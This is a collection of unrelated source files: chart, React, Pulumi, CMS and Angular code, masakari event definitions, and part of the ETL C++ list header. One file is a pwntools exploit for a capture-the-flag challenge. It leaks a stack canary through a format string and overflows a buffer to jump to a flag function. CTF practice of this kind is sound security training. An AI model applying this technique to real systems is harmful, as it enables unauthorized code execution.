    return labelShape.data[compConfig.data[0]].label;
  }
  // Fall back to the shape's own label, or a dash placeholder.
  return labelShape.data && labelShape.data.label ? labelShape.data.label : '-';
}
/**
* @typedef {object} component--brush-area-dir-settings
* @property {object} brush
* @property {array} brush.components
 * @property {string} brush.components[].key - Component key
* @property {object} brush.components[].contexts[] - Brush context to apply changes to
* @property {object} [brush.components[].data] - Data reference
* @property {object} [brush.components[].action] - Type of brush action
 * @property {string} [direction=horizontal] - Rendering direction [horizontal|vertical]; any value other than 'vertical' is treated as horizontal
* @property {object} [bubbles]
* @property {boolean} [bubbles.show=true] - True to show label bubble, false otherwise
* @property {string} [bubbles.align=start] - Where to anchor bubble [start|end]
* @property {function} [bubbles.label] - Callback function for the labels
* @property {object} [target]
* @property {string} [target.component] - Render matching overlay on target component
*/
/**
* @typedef {object} component--brush-area-dir-style
* @property {object} [bubble]
* @property {string} [bubble.fontSize]
* @property {string} [bubble.fontFamily]
* @property {string} [bubble.fill]
* @property {string} [bubble.color]
* @property {string} [bubble.stroke]
* @property {number} [bubble.strokeWidth]
* @property {number} [bubble.borderRadius]
* @property {object} [line]
* @property {string} [line.stroke]
* @property {number} [line.strokeWidth]
* @property {object} [target]
* @property {string} [target.fill]
* @property {number} [target.strokeWidth]
* @property {number} [target.opacity]
*/
// Directional brush-area component. Renders an interactive selection area
// (vertical or horizontal) with optional label bubbles and an optional
// overlay aligned to a target component.
const brushAreaDirectionalComponent = {
  require: ['chart', 'settings', 'renderer'],
  defaultSettings: {
    settings: {
      bubbles: {
        show: true,
        align: 'start'
      }
    },
    style: {
      bubble: '$label-overlay',
      line: '$shape-guide--inverted',
      target: '$selection-area-target'
    }
  },
  renderer: 'dom',
  // Area gestures are delegated to the interaction methods below.
  on: {
    areaStart(e) { this.start(e); },
    areaMove(e) { this.move(e); },
    areaEnd(e) { this.end(e); },
    areaClear(e) { this.clear(e); }
  },
  created() {
    this.rect = {
      x: 0, y: 0, width: 0, height: 0
    };
    this.state = {};
  },
  beforeRender(opts) {
    this.rect = opts.size;
  },
  render(h) {
    // Rebuild the interaction state from the current settings and layout.
    this.state.rect = this.rect;
    const stngs = this.settings.settings;
    // Any direction other than 'vertical' (including undefined) falls back
    // to horizontal.
    const direction = stngs.direction === 'vertical' ? VERTICAL : HORIZONTAL;
    const size = this.state.rect[direction === VERTICAL ? 'height' : 'width'];
    const offset = this.renderer.element().getBoundingClientRect();
    const target = stngs.target ? this.chart.component(stngs.target.component) : null;
    if (target && target.rect) {
      // Overlay rectangle expressed relative to this component's own area.
      this.state.targetRect = {
        x: (target.rect.x - this.rect.x),
        y: (target.rect.y - this.rect.y),
        width: target.rect.width,
        height: target.rect.height
      };
    } else {
      this.state.targetRect = null;
    }
    this.state.style = this.style;
    this.state.chart = this.chart;
    this.state.direction = direction;
    this.state.settings = stngs;
    this.state.offset = offset;
    this.state.rc = rangeCollection();
    this.state.renderer = this.renderer;
    this.state.multi = !!stngs.multiple;
    this.state.h = h;
    this.state.size = size;
    // Direction-keyed accessors so the interaction code can be written
    // without branching on orientation.
    this.state.cssCoord = {
      offset: this.state.direction === VERTICAL ? 'top' : 'left',
      coord: this.state.direction === VERTICAL ? 'y' : 'x',
      pos: this.state.direction === VERTICAL ? 'deltaY' : 'deltaX',
      area: this.state.direction === VERTICAL ? 'height' : 'width'
    };
    this.state.format = function getFormat(v, r) {
      return getBubbleLabel(this, v, r);
    };
    // Nothing is rendered until an interaction starts.
    return [];
  },
  start(e) {
    startArea({
      e,
      state: this.state,
      renderer: this.renderer,
      ranges,
      targetSize: TARGET_SIZE
    });
  },
  end() {
    // Ignore stray end events when no gesture is in progress.
    if (!this.state.started) {
      return;
    }
    endArea(this.state, ranges);
    render(this.state);
  },
  move(e) {
    if (!this.state.started) {
      return;
    }
    moveArea(this.state, e);
    setRanges(this.state);
    render(this.state);
  },
  clear() {
    if (this.state.rc) {
      this.state.rc.clear();
    }
    // Remove all rendered brush visuals.
    this.state.renderer.render([]);
  }
};

export default brushAreaDirectionalComponent;
|
import React, { Component } from "react";
import logo from "./logo.svg";
import "./App.css";
import { ApolloClient, gql, graphql, ApolloProvider } from "react-apollo";
// Apollo client with default configuration (default network interface).
const client = new ApolloClient();

// Query fetching every channel's id and name.
const channelsListQuery = gql`
  query ChannelsListQuery {
    channels {
      id
      name
    }
  }
`;
const ChannelsList = ({ data: {loading, error, channels }}) => {
if (loading) {
return <p>Loading ...</p>;
}
if (error) {
return <p>{error.message}</p>;
}
return <ul>
{ channels.map( ch => <li key={ch.id}>{ch.name}</li> ) }
</ul>;
};
const ChannelsListWithData = graphql(channelsListQuery)(ChannelsList);
// Root application component: provides the Apollo client to the component
// tree and renders the channels list below the standard CRA header.
class App extends Component {
  render() {
    return (
      <ApolloProvider client={client}>
        <div className="App">
          <div className="App-header">
            <img src={logo} className="App-logo" alt="logo" />
            <h2>Welcome to React</h2>
          </div>
          <ChannelsListWithData />
        </div>
      </ApolloProvider>
    );
  }
}

export default App;
|
/* eslint-disable no-undef */
import React from 'react';
import { render } from '@testing-library/react';
import { DayOfWeek } from '../../src/components';
// Renders DayOfWeek with representative props and checks the title appears.
it('render day of week and confirm title appears', () => {
  const { getByText } = render(
    <DayOfWeek
      title="Sun"
      highTemp="72.5"
      lowTemp="71.5"
      weather="01d"
    />);
  const title = getByText('Sun');
  expect(title).toBeTruthy();
});

// Smoke test with different (minimal) prop values.
// NOTE(review): this effectively duplicates the assertion above with other
// props — consider asserting something distinct (e.g. temps or icon).
it('render day of week without crashing', () => {
  const { getByText } = render(
    <DayOfWeek
      title="Sun"
      highTemp="5"
      lowTemp="9"
      weather="01"
    />);
  const title = getByText("Sun");
  expect(title).toBeTruthy();
});
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
# Export this package's modules as members:
from .alarm import *
from .attachment import *
from .get_alarms import *
from .get_lifecycle_hooks import *
from .get_notifications import *
from .get_scaling_configurations import *
from .get_scaling_groups import *
from .get_scaling_rules import *
from .get_scheduled_tasks import *
from .lifecycle_hook import *
from .notification import *
from .scaling_configuration import *
from .scaling_group import *
from .scaling_group_v_server_groups import *
from .scaling_rule import *
from .schedule import *
from .scheduled_task import *
from ._inputs import *
from . import outputs
def _register_module():
    """Register this package's resource types with the Pulumi runtime so
    that resources can be rehydrated from their URNs.
    """
    import pulumi
    from .. import _utilities

    class Module(pulumi.runtime.ResourceModule):
        # Semver of this provider package, resolved once at class creation.
        _version = _utilities.get_semver_version()

        def version(self):
            return Module._version

        def construct(self, name: str, typ: str, urn: str) -> pulumi.Resource:
            # Dispatch table: fully-qualified resource type token -> class.
            constructors = {
                "alicloud:ess/alarm:Alarm": Alarm,
                "alicloud:ess/attachment:Attachment": Attachment,
                "alicloud:ess/lifecycleHook:LifecycleHook": LifecycleHook,
                "alicloud:ess/notification:Notification": Notification,
                "alicloud:ess/scalingConfiguration:ScalingConfiguration": ScalingConfiguration,
                "alicloud:ess/scalingGroup:ScalingGroup": ScalingGroup,
                "alicloud:ess/scalingGroupVServerGroups:ScalingGroupVServerGroups": ScalingGroupVServerGroups,
                "alicloud:ess/scalingRule:ScalingRule": ScalingRule,
                "alicloud:ess/schedule:Schedule": Schedule,
                "alicloud:ess/scheduledTask:ScheduledTask": ScheduledTask,
            }
            if typ not in constructors:
                raise Exception(f"unknown resource type {typ}")
            return constructors[typ](name, pulumi.ResourceOptions(urn=urn))

    _module_instance = Module()
    # One registration per module token handled by this package.
    for mod_token in (
        "ess/alarm",
        "ess/attachment",
        "ess/lifecycleHook",
        "ess/notification",
        "ess/scalingConfiguration",
        "ess/scalingGroup",
        "ess/scalingGroupVServerGroups",
        "ess/scalingRule",
        "ess/schedule",
        "ess/scheduledTask",
    ):
        pulumi.runtime.register_resource_module("alicloud", mod_token, _module_instance)
_register_module()
|
import AbstractNodeScreen from '@triniti/cms/plugins/ncr/screens/node';
import createDelegateFactory from '@triniti/app/createDelegateFactory';
import { connect } from 'react-redux';
import delegateFactory from './delegate';
import Form from './Form';
import selector from './selector';
// Screen for editing an app node, built on the generic NCR node screen.
class AppScreen extends AbstractNodeScreen {
  // Form component used to edit the node.
  getForm() {
    return Form;
  }

  // Extra props forwarded to the form when it renders.
  getFormRenderProps() {
    const { getNodeRequestState } = this.props;
    return {
      getNodeRequestState,
      // Node type is taken from the route parameters.
      type: this.props.match.params.type,
    };
  }

  // Tabs shown on the screen.
  getTabs() {
    return [
      'details',
      'roles',
    ];
  }
}

export default connect(selector, createDelegateFactory(delegateFactory))(AppScreen);
|
/**
* APIMATICCalculatorDevOpsLib
*
* This file was automatically generated for testing by APIMATIC v2.0 ( https://apimatic.io ).
*/
// IIFE that registers the Configuration factory on the library's Angular
// module. The factory exposes API-wide configuration values.
;(function (angular) {
    'use strict';

    angular.module('APIMATICCalculatorDevOpsLib')
        .factory('Configuration', [Configuration]);

    // Factory returning the shared configuration object.
    function Configuration() {
        return {
            //The base Uri for API calls
            BASEURI : 'http://examples.apimatic.io/apps/calculator'
        };
    }
}(angular));
|
# Copyright 2017 NTT DATA
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" VM libvirt events
These are the events which needs to be processed by masakari in case of
instance recovery failure.
"""
# Recognised libvirt event names mapped to the vir_domain_event values that
# masakari should process. Extend these lists to handle additional
# QEMU guest agent events and vir_domain_events.
INSTANCE_EVENTS = {
    'QEMU_GUEST_AGENT_ERROR': ['STOPPED_FAILED'],
    'LIFECYCLE': ['STOPPED_FAILED'],
    'IO_ERROR': ['IO_ERROR_REPORT'],
}


def is_valid_event(payload):
    """Return True when the payload describes an event masakari handles.

    The payload must carry a known 'event' name and a 'vir_domain_event'
    value listed for that event in INSTANCE_EVENTS.
    """
    allowed = INSTANCE_EVENTS.get(payload.get('event'))
    return bool(allowed) and payload.get('vir_domain_event') in allowed
|
import React from 'react';
import { Grid, Header, Segment } from 'semantic-ui-react'
// Header row for the forum table: topic title, reply count and latest
// reply columns. The two right-hand columns are hidden on small screens.
export default class ForumHeader extends React.Component {
  render() {
    return (
      <Segment attached='top' secondary>
        <Grid>
          <Grid.Row>
            <Grid.Column width={10}>
              <Header size='small'>
                Forum
              </Header>
            </Grid.Column>
            <Grid.Column width={2} only='large screen' className='center aligned'>
              <Header size='small'>
                Replies
              </Header>
            </Grid.Column>
            <Grid.Column width={4} only='large screen'>
              <Header size='small'>
                Latest Reply
              </Header>
            </Grid.Column>
          </Grid.Row>
        </Grid>
      </Segment>
    )
  }
}
|
# Exploit for the "canary" CTF challenge: leak the stack canary via a format
# string bug, then overflow the buffer while preserving the canary so the
# return address can be redirected to the flag() function.
from pwn import *

#p = process("./canary"); gdb.attach(p)
p = remote("shell.actf.co", 20701)
e = ELF("./canary")

# Stage 1: leak the canary. "%17$lx" prints the 17th stack qword as hex.
xpl = ""
xpl += "%17$lx"
p.sendlineafter("your name?", xpl)
canary = p.recvline()
# The leaked hex value is the 6th whitespace-separated token; drop the "!".
canary = canary.split(" ")[5].replace("!", "")
canary = int(canary, 16)
info("Canary ==> %s"%hex(canary))

# Stage 2: overflow. 56 bytes of padding up to the canary, the leaked canary
# itself, 8 bytes of saved-RBP filler, then the return address -> flag().
xpl = ""
xpl += "A"*56
xpl += p64(canary)
xpl += "A"*8
xpl += p64(e.sym["flag"])
p.sendlineafter("tell me?", xpl)
p.interactive()

#p.wait()
#core = p.corefile
#stack = core.rsp
#info("%#x stack", stack)
#actf{youre_a_canary_killer_>:(}
|
///\file
/******************************************************************************
The MIT License(MIT)
Embedded Template Library.
https://github.com/ETLCPP/etl
http://www.etlcpp.com
Copyright(c) 2014 jwellbelove
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files(the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions :
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
******************************************************************************/
#ifndef __ETL_LIST__
#define __ETL_LIST__
#include <iterator>
#include <algorithm>
#include <functional>
#include <stddef.h>
#include "platform.h"
#include "container.h"
#include "pool.h"
#include "exception.h"
#include "error_handler.h"
#include "debug_count.h"
#include "nullptr.h"
#include "type_traits.h"
#include "parameter_type.h"
#include "algorithm.h"
#ifdef ETL_COMPILER_MICROSOFT
#undef min
#endif
#undef ETL_FILE
#define ETL_FILE "7"
//*****************************************************************************
///\defgroup list list
/// A linked list with the capacity defined at compile time.
///\ingroup containers
//*****************************************************************************
namespace etl
{
//***************************************************************************
/// Exception for the list.
///\ingroup list
//***************************************************************************
/// Base class for all list exceptions; forwards the reason text plus the
/// source location to etl::exception.
class list_exception : public exception
{
public:

  list_exception(string_type reason_, string_type file_name_, numeric_type line_number_)
    : exception(reason_, file_name_, line_number_)
  {
  }
};

//***************************************************************************
/// Full exception for the list: raised when an insertion would exceed MAX_SIZE.
///\ingroup list
//***************************************************************************
class list_full : public list_exception
{
public:

  list_full(string_type file_name_, numeric_type line_number_)
    // ETL_FILE"A" forms the compact error id ("7A") used by the error handler.
    : list_exception(ETL_ERROR_TEXT("list:full", ETL_FILE"A"), file_name_, line_number_)
  {
  }
};

//***************************************************************************
/// Empty exception for the list: raised when popping from an empty list.
///\ingroup list
//***************************************************************************
class list_empty : public list_exception
{
public:

  list_empty(string_type file_name_, numeric_type line_number_)
    : list_exception(ETL_ERROR_TEXT("list:empty", ETL_FILE"B"), file_name_, line_number_)
  {
  }
};

//***************************************************************************
/// Iterator exception for the list: raised on invalid iterator ranges.
///\ingroup list
//***************************************************************************
class list_iterator : public list_exception
{
public:

  list_iterator(string_type file_name_, numeric_type line_number_)
    : list_exception(ETL_ERROR_TEXT("list:iterator", ETL_FILE"C"), file_name_, line_number_)
  {
  }
};

//***************************************************************************
/// Unsorted exception for the list: raised by operations requiring sorted input.
///\ingroup list
//***************************************************************************
class list_unsorted : public list_exception
{
public:

  list_unsorted(string_type file_name_, numeric_type line_number_)
    : list_exception(ETL_ERROR_TEXT("list:unsorted", ETL_FILE"D"), file_name_, line_number_)
  {
  }
};
//***************************************************************************
/// The base class for all lists.
///\ingroup list
//***************************************************************************
/// Non-templated base holding the intrusive doubly-linked structure and the
/// size bookkeeping shared by every etl::list instantiation. The list is
/// circular through 'terminal_node', which acts as both sentinel head and tail.
class list_base
{
public:

  typedef size_t size_type; ///< The type used for determining the size of list.

  //*************************************************************************
  /// The node element in the list.
  //*************************************************************************
  struct node_t
  {
    //***********************************************************************
    /// Constructor. Both links start null; they are wired up on insertion.
    //***********************************************************************
    node_t()
      : previous(nullptr),
        next(nullptr)
    {
    }

    //***********************************************************************
    /// Reverses the previous & next pointers.
    //***********************************************************************
    inline void reverse()
    {
      std::swap(previous, next);
    }

    node_t* previous; ///< Link to the preceding node (or terminal_node).
    node_t* next;     ///< Link to the following node (or terminal_node).
  };

  //*************************************************************************
  /// Reverses the list in place by swapping every node's link pair,
  /// including the terminal sentinel. O(n), no allocation.
  //*************************************************************************
  void reverse()
  {
    if (is_trivial_list())
    {
      return;
    }

    node_t* p_node = terminal_node.next;

    while (p_node != &terminal_node)
    {
      // Swap the links, then follow 'previous' (which now holds the old
      // 'next'), so the walk still proceeds in the original direction.
      node_t* p_temp = p_node->previous;
      p_node->previous = p_node->next;
      p_node->next = p_temp;
      p_node = p_node->previous;
    }

    // Terminal node.
    node_t* p_temp = p_node->previous;
    p_node->previous = p_node->next;
    p_node->next = p_temp;
  }

  //*************************************************************************
  /// Gets the maximum possible size of the list.
  //*************************************************************************
  size_type max_size() const
  {
    return MAX_SIZE;
  }

  //*************************************************************************
  /// Gets the size of the list. Delegated to the node pool: every live
  /// node is a pool allocation, so pool size == list size.
  //*************************************************************************
  size_type size() const
  {
    return p_node_pool->size();
  }

  //*************************************************************************
  /// Checks to see if the list is empty.
  //*************************************************************************
  bool empty() const
  {
    return p_node_pool->empty();
  }

  //*************************************************************************
  /// Checks to see if the list is full.
  //*************************************************************************
  bool full() const
  {
    return p_node_pool->size() == MAX_SIZE;
  }

  //*************************************************************************
  /// Returns the remaining capacity.
  ///\return The remaining capacity.
  //*************************************************************************
  size_t available() const
  {
    return max_size() - size();
  }

  //*************************************************************************
  /// Is the list a trivial length (0 or 1 elements, nothing to reverse)?
  //*************************************************************************
  bool is_trivial_list() const
  {
    return (size() < 2);
  }

protected:

  //*************************************************************************
  /// Get the head node (first element; terminal_node itself when empty).
  //*************************************************************************
  node_t& get_head()
  {
    return *terminal_node.next;
  }

  //*************************************************************************
  /// Get the head node.
  //*************************************************************************
  const node_t& get_head() const
  {
    return *terminal_node.next;
  }

  //*************************************************************************
  /// Get the tail node (last element; terminal_node itself when empty).
  //*************************************************************************
  node_t& get_tail()
  {
    return *terminal_node.previous;
  }

  //*************************************************************************
  /// Get the tail node.
  //*************************************************************************
  const node_t& get_tail() const
  {
    return *terminal_node.previous;
  }

  //*************************************************************************
  /// Insert a node before 'position'.
  //*************************************************************************
  void insert_node(node_t& position, node_t& node)
  {
    // Connect to the list.
    join(*position.previous, node);
    join(node, position);
  }

  //*************************************************************************
  /// Join two nodes so that 'left' directly precedes 'right'.
  //*************************************************************************
  void join(node_t& left, node_t& right)
  {
    left.next = &right;
    right.previous = &left;
  }

  //*************************************************************************
  /// The constructor that is called from derived classes.
  /// The derived class owns the actual pool storage; only a pointer is kept.
  //*************************************************************************
  list_base(etl::ipool& node_pool_, size_type max_size_)
    : p_node_pool(&node_pool_),
      MAX_SIZE(max_size_)
  {
  }

  //*************************************************************************
  /// Destructor. Non-virtual: ETL containers are not deleted via base pointers.
  //*************************************************************************
  ~list_base()
  {
  }

  etl::ipool* p_node_pool;          ///< The pool of data nodes used in the list.
  node_t terminal_node;             ///< The node that acts as the list start and end.
  const size_type MAX_SIZE;         ///< The maximum size of the list.
  etl::debug_count construct_count; ///< Internal debugging.
};
//***************************************************************************
/// A templated base for all etl::list types.
///\ingroup list
//***************************************************************************
template <typename T>
class ilist : public etl::list_base
{
public:
  typedef T value_type;             // Standard container typedefs.
  typedef T* pointer;
  typedef const T* const_pointer;
  typedef T& reference;
  typedef const T& const_reference;
  typedef size_t size_type;

protected:

  // Pass-by-value or pass-by-const-ref, whichever is cheaper for T.
  typedef typename etl::parameter_type<T>::type parameter_t;

  //*************************************************************************
  /// The data node element in the list: a link node carrying the value.
  //*************************************************************************
  struct data_node_t : public node_t
  {
    explicit data_node_t(parameter_t value_)
      : value(value_)
    {
    }

    T value; ///< The stored element.
  };

private:

  // The following casts are only valid for nodes that really are
  // data_node_t allocations; terminal_node is a plain node_t and must
  // never be passed through them.

  //*************************************************************************
  /// Downcast a node_t* to a data_node_t*
  //*************************************************************************
  static data_node_t* data_cast(node_t* p_node)
  {
    return reinterpret_cast<data_node_t*>(p_node);
  }

  //*************************************************************************
  /// Downcast a node_t& to a data_node_t&
  //*************************************************************************
  static data_node_t& data_cast(node_t& node)
  {
    return reinterpret_cast<data_node_t&>(node);
  }

  //*************************************************************************
  /// Downcast a const node_t* to a const data_node_t*
  //*************************************************************************
  static const data_node_t* data_cast(const node_t* p_node)
  {
    return reinterpret_cast<const data_node_t*>(p_node);
  }

  //*************************************************************************
  /// Downcast a const node_t& to a const data_node_t&
  //*************************************************************************
  static const data_node_t& data_cast(const node_t& node)
  {
    return reinterpret_cast<const data_node_t&>(node);
  }
public:
//*************************************************************************
/// iterator.
//*************************************************************************
class iterator : public std::iterator<std::bidirectional_iterator_tag, T>
{
public:
friend class ilist;
iterator()
: p_node(nullptr)
{
}
iterator(node_t& node)
: p_node(&node)
{
}
iterator(const iterator& other)
: p_node(other.p_node)
{
}
iterator& operator ++()
{
p_node = p_node->next;
return *this;
}
iterator operator ++(int)
{
iterator temp(*this);
p_node = p_node->next;
return temp;
}
iterator& operator --()
{
p_node = p_node->previous;
return *this;
}
iterator operator --(int)
{
iterator temp(*this);
p_node = p_node->previous;
return temp;
}
iterator operator =(const iterator& other)
{
p_node = other.p_node;
return *this;
}
reference operator *()
{
return ilist::data_cast(p_node)->value;
}
const_reference operator *() const
{
return ilist::data_cast(p_node)->value;
}
pointer operator &()
{
return &(ilist::data_cast(p_node)->value);
}
const_pointer operator &() const
{
return &(ilist::data_cast(p_node)->value);
}
pointer operator ->()
{
return &(ilist::data_cast(p_node)->value);
}
const_pointer operator ->() const
{
return &(ilist::data_cast(p_node)->value);
}
friend bool operator == (const iterator& lhs, const iterator& rhs)
{
return lhs.p_node == rhs.p_node;
}
friend bool operator != (const iterator& lhs, const iterator& rhs)
{
return !(lhs == rhs);
}
private:
node_t* p_node;
};
//*************************************************************************
/// const_iterator
//*************************************************************************
class const_iterator : public std::iterator<std::bidirectional_iterator_tag, const T>
{
public:
friend class ilist;
const_iterator()
: p_node(nullptr)
{
}
const_iterator(node_t& node)
: p_node(&node)
{
}
const_iterator(const node_t& node)
: p_node(&node)
{
}
const_iterator(const typename ilist::iterator& other)
: p_node(other.p_node)
{
}
const_iterator(const const_iterator& other)
: p_node(other.p_node)
{
}
const_iterator& operator ++()
{
p_node = p_node->next;
return *this;
}
const_iterator operator ++(int)
{
const_iterator temp(*this);
p_node = p_node->next;
return temp;
}
const_iterator& operator --()
{
p_node = p_node->previous;
return *this;
}
const_iterator operator --(int)
{
const_iterator temp(*this);
p_node = p_node->previous;
return temp;
}
const_iterator operator =(const const_iterator& other)
{
p_node = other.p_node;
return *this;
}
const_reference operator *() const
{
return ilist::data_cast(p_node)->value;
}
const_pointer operator &() const
{
return &(ilist::data_cast(p_node)->value);
}
const_pointer operator ->() const
{
return &(ilist::data_cast(p_node)->value);
}
friend bool operator == (const const_iterator& lhs, const const_iterator& rhs)
{
return lhs.p_node == rhs.p_node;
}
friend bool operator != (const const_iterator& lhs, const const_iterator& rhs)
{
return !(lhs == rhs);
}
private:
const node_t* p_node;
};
typedef typename std::iterator_traits<iterator>::difference_type difference_type;
typedef std::reverse_iterator<iterator> reverse_iterator;
typedef std::reverse_iterator<const_iterator> const_reverse_iterator;
//*************************************************************************
/// Gets the beginning of the list.
//*************************************************************************
iterator begin()
{
return iterator(get_head());
}
//*************************************************************************
/// Gets the beginning of the list.
//*************************************************************************
const_iterator begin() const
{
return const_iterator(get_head());
}
//*************************************************************************
/// Gets the end of the list.
//*************************************************************************
iterator end()
{
return iterator(terminal_node);
}
//*************************************************************************
/// Gets the end of the list.
//*************************************************************************
const_iterator end() const
{
return const_iterator(static_cast<const data_node_t&>(terminal_node));
}
//*************************************************************************
/// Gets the beginning of the list.
//*************************************************************************
const_iterator cbegin() const
{
return const_iterator(get_head());
}
//*************************************************************************
/// Gets the end of the list.
//*************************************************************************
const_iterator cend() const
{
return const_iterator(static_cast<const data_node_t&>(terminal_node));
}
//*************************************************************************
/// Gets the reverse beginning of the list.
//*************************************************************************
reverse_iterator rbegin()
{
return reverse_iterator(terminal_node);
}
//*************************************************************************
/// Gets the reverse beginning of the list.
//*************************************************************************
const_reverse_iterator rbegin() const
{
return const_reverse_iterator(static_cast<const data_node_t&>(terminal_node));
}
//*************************************************************************
/// Gets the reverse end of the list.
//*************************************************************************
reverse_iterator rend()
{
return reverse_iterator(get_head());
}
//*************************************************************************
/// Gets the reverse beginning of the list.
//*************************************************************************
const_reverse_iterator crbegin() const
{
return const_reverse_iterator(static_cast<const data_node_t&>(terminal_node));
}
//*************************************************************************
/// Gets the reverse end of the list.
//*************************************************************************
const_reverse_iterator crend() const
{
return const_reverse_iterator(get_head());
}
  //*************************************************************************
  /// Gets a reference to the first element.
  /// Undefined when the list is empty (would alias the terminal node).
  //*************************************************************************
  reference front()
  {
    return data_cast(get_head()).value;
  }

  //*************************************************************************
  /// Gets a const reference to the first element.
  //*************************************************************************
  const_reference front() const
  {
    return data_cast(get_head()).value;
  }

  //*************************************************************************
  /// Gets a reference to the last element.
  /// Undefined when the list is empty (would alias the terminal node).
  //*************************************************************************
  reference back()
  {
    return data_cast(get_tail()).value;
  }

  //*************************************************************************
  /// Gets a const reference to the last element.
  //*************************************************************************
  const_reference back() const
  {
    return data_cast(get_tail()).value;
  }
//*************************************************************************
/// Assigns a range of values to the list.
/// If asserts or exceptions are enabled throws etl::list_full if the list does not have enough free space.
/// If ETL_THROW_EXCEPTIONS & ETL_DEBUG are defined throws list_iterator if the iterators are reversed.
//*************************************************************************
template <typename TIterator>
void assign(TIterator first, TIterator last)
{
#if defined(ETL_DEBUG)
difference_type d = std::distance(first, last);
ETL_ASSERT(d >= 0, ETL_ERROR(list_iterator));
ETL_ASSERT(size_t(d) <= MAX_SIZE, ETL_ERROR(list_full));
#endif
initialise();
// Add all of the elements.
while (first != last)
{
data_node_t& node = allocate_data_node(*first);
join(get_tail(), node);
join(node, terminal_node);
++first;
}
}
//*************************************************************************
/// Assigns 'n' copies of a value to the list.
//*************************************************************************
void assign(size_t n, parameter_t value)
{
#if defined(ETL_DEBUG)
ETL_ASSERT(n <= MAX_SIZE, ETL_ERROR(list_full));
#endif
initialise();
// Add all of the elements.
while (size() < n)
{
data_node_t& node = allocate_data_node(value);
join(*terminal_node.previous, node);
join(node, terminal_node);
}
}
//*************************************************************************
/// Adds a node to the front of the list so a new value can be assigned to front().
//*************************************************************************
  void push_front()
  {
    // Default-constructed element; the caller assigns via front().
    push_front(T());
  }

  //*************************************************************************
  /// Pushes a value to the front of the list.
  /// Throws etl::list_full under ETL_CHECK_PUSH_POP when at capacity.
  //*************************************************************************
  void push_front(parameter_t value)
  {
#if defined(ETL_CHECK_PUSH_POP)
    ETL_ASSERT(!full(), ETL_ERROR(list_full));
#endif
    insert_node(get_head(), allocate_data_node(value));
  }
//*************************************************************************
/// Emplaces a value to the front of the list..
//*************************************************************************
  // Each emplace_front overload allocates an uninitialised node from the
  // pool, placement-constructs the value in situ from the given arguments
  // (pre-C++11 emulation of variadic emplace), then links it at the head.
  // NOTE(review): if T's constructor throws, the allocated node is not
  // returned to the pool — confirm against the pool's error policy.
  template <typename T1>
  void emplace_front(const T1& value1)
  {
#if defined(ETL_CHECK_PUSH_POP)
    ETL_ASSERT(!full(), ETL_ERROR(list_full));
#endif
    data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
    ::new (&(p_data_node->value)) T(value1);
    ++construct_count;
    insert_node(get_head(), *p_data_node);
  }

  //*************************************************************************
  /// Emplaces a value at the front of the list (two constructor arguments).
  //*************************************************************************
  template <typename T1, typename T2>
  void emplace_front(const T1& value1, const T2& value2)
  {
#if defined(ETL_CHECK_PUSH_POP)
    ETL_ASSERT(!full(), ETL_ERROR(list_full));
#endif
    data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
    ::new (&(p_data_node->value)) T(value1, value2);
    ++construct_count;
    insert_node(get_head(), *p_data_node);
  }

  //*************************************************************************
  /// Emplaces a value at the front of the list (three constructor arguments).
  //*************************************************************************
  template <typename T1, typename T2, typename T3>
  void emplace_front(const T1& value1, const T2& value2, const T3& value3)
  {
#if defined(ETL_CHECK_PUSH_POP)
    ETL_ASSERT(!full(), ETL_ERROR(list_full));
#endif
    data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
    ::new (&(p_data_node->value)) T(value1, value2, value3);
    ++construct_count;
    insert_node(get_head(), *p_data_node);
  }

  //*************************************************************************
  /// Emplaces a value at the front of the list (four constructor arguments).
  //*************************************************************************
  template <typename T1, typename T2, typename T3, typename T4>
  void emplace_front(const T1& value1, const T2& value2, const T3& value3, const T4& value4)
  {
#if defined(ETL_CHECK_PUSH_POP)
    ETL_ASSERT(!full(), ETL_ERROR(list_full));
#endif
    data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
    ::new (&(p_data_node->value)) T(value1, value2, value3, value4);
    ++construct_count;
    insert_node(get_head(), *p_data_node);
  }
//*************************************************************************
/// Removes a value from the front of the list.
//*************************************************************************
  /// Removes the first element. Throws etl::list_empty under
  /// ETL_CHECK_PUSH_POP when the list is empty.
  void pop_front()
  {
#if defined(ETL_CHECK_PUSH_POP)
    ETL_ASSERT(!empty(), ETL_ERROR(list_empty));
#endif
    node_t& node = get_head();
    // remove_node (defined later in the class) unlinks and destroys it.
    remove_node(node);
  }
//*************************************************************************
/// Adds a node to the back of the list so a new value can be assigned to back().
//*************************************************************************
  void push_back()
  {
    // Default-constructed element; the caller assigns via back().
    push_back(T());
  }

  //*************************************************************************
  /// Pushes a value to the back of the list.
  /// Throws etl::list_full under ETL_CHECK_PUSH_POP when at capacity.
  //*************************************************************************
  void push_back(parameter_t value)
  {
#if defined(ETL_CHECK_PUSH_POP)
    ETL_ASSERT(!full(), ETL_ERROR(list_full));
#endif
    // Inserting before the terminal sentinel appends at the tail.
    insert_node(terminal_node, allocate_data_node(value));
  }
//*************************************************************************
